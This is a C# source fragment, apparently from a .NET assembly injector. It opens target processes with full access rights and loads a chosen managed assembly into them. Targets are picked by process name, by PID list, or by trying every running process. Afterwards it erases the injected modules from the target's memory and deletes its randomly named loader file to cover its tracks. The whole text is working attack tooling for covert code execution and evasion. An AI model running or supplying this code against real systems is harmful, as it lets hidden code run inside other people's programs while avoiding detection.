/// <summary>
/// Inject .NET Assembly into Remote Process using Process Name as Parameter. One Single Process Name can result in Several Process with Same Name, but, different PIDs
/// </summary>
/// <param name="targetProcessName">The process Name of the process to inject. EX: notepad++</param>
/// <returns></returns>
public List <InjectorResult> InjectWithProcessName(String targetProcessName)
{
// Return Object
List <InjectorResult> hResult = new List <InjectorResult>();
// Get Possible Process
Process[] targetProcessList = Process.GetProcessesByName(targetProcessName);
// Check if Process Exists
if (targetProcessList == null || targetProcessList.Length == 0)
{
hResult.Add(
new InjectorResult()
{
TargetProcessName = targetProcessName,
Status = InjectorResultStatus.TARGET_PROCESS_NOT_FOUND
}
);
}
else
{
foreach (Process process in targetProcessList)
{
InjectorResult result = this.DoInject(process.Id);
hResult.Add(result);
if (result.Status == InjectorResultStatus.OK)
{
break;
}
}
}
return(hResult);
}
/// <summary>
/// Execute using Process Id List
/// </summary>
/// <param name="hResult"></param>
/// <returns></returns>
private List <InjectorResult> ExecuteForProcessIds()
{
List <InjectorResult> hResult = new List <InjectorResult>();
foreach (Int32 processId in this.configuration.TargetProcessIds)
{
InjectorResult result = this.DoInject(processId);
hResult.Add(result);
if (result.Status == InjectorResultStatus.OK)
{
break;
}
}
return(hResult);
}
/// <summary>
/// Try to Inject on Every Running Process
/// </summary>
/// <returns></returns>
private List <InjectorResult> RunForBruteForce()
{
List <InjectorResult> hResult = new List <InjectorResult>();
foreach (Process process in Process.GetProcesses())
{
InjectorResult result = this.DoInject(process.Id);
hResult.Add(result);
if (result.Status == InjectorResultStatus.OK)
{
//break;
}
}
return(hResult);
}
/// <summary>
/// Inject .NET Assembly into Remote Process
/// </summary>
/// <returns></returns>
private InjectorResult DoInject(Int32 targetProcessId)
{
// Create Result Object
InjectorResult hResult = new InjectorResult()
{
TargetProcessId = targetProcessId
};
try
{
// Copy DNCIClrLoader.dll into Temporary Folder with Random Name
String dnciLoaderLibraryPath = WriteLoaderToDisk();
// Open and get handle of the process - with required privileges
IntPtr targetProcessHandle = NativeExecution.OpenProcess(
NativeConstants.PROCESS_ALL_ACCESS,
false,
targetProcessId
);
// Check Process Handle
if (targetProcessHandle == null || targetProcessHandle == IntPtr.Zero)
{
hResult.Status = InjectorResultStatus.UNABLE_TO_GET_PROCESS_HANDLE;
return(hResult);
}
// Get Process Name
hResult.TargetProcessName = Process.GetProcessById(targetProcessId).ProcessName;
// Find the LoadDNA Function Point into Remote Process Memory
IntPtr dnciModuleHandle = DNCIClrLoader(targetProcessHandle, dnciLoaderLibraryPath, Path.GetFileName(dnciLoaderLibraryPath));
// Check Injector Handle
if (dnciModuleHandle == null || dnciModuleHandle == IntPtr.Zero)
{
hResult.Status = InjectorResultStatus.UNABLE_TO_FIND_INJECTOR_HANDLE;
return(hResult);
}
// Inject Managed Assembly
LoadManagedAssemblyOnRemoteProcess(targetProcessHandle, dnciModuleHandle, this.configuration.MethodName, this.configuration.AssemblyFileLocation, this.configuration.TypeName, this.configuration.ArgumentString, dnciLoaderLibraryPath);
// Erase Modules from Target Process
EraseRemoteModules(targetProcessHandle, dnciModuleHandle);
// Close Remote Process Handle
NativeExecution.CloseHandle(targetProcessHandle);
// Remove Temporary File
try
{
File.Delete(dnciLoaderLibraryPath);
}
catch { }
hResult.Status = InjectorResultStatus.OK;
}
catch
{
hResult.Status = InjectorResultStatus.MASTER_ERROR;
}
return(hResult);
}
